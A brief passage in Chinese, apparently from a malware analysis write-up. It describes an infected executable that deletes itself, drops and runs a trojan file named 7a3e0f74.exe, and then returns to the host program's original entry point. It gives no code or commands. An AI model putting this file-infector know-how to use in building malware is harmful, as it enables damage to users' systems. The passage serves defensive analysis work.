因这木马病毒文件在运行后文件会自动删除,并执行一些恶意破坏系统的文件,所以上面代码中就不执行004602A3处的代码了。
3、被感染的文件主要作用就是生成一个名为7a3e0f74.exe的木马文件并运行,所以关键部分还是在所生成的文件里,还得分析,另外被感染的文件大小也有所变化。
4、完成上面的工作后,文件跳回到未感染文件的入口,如图所示: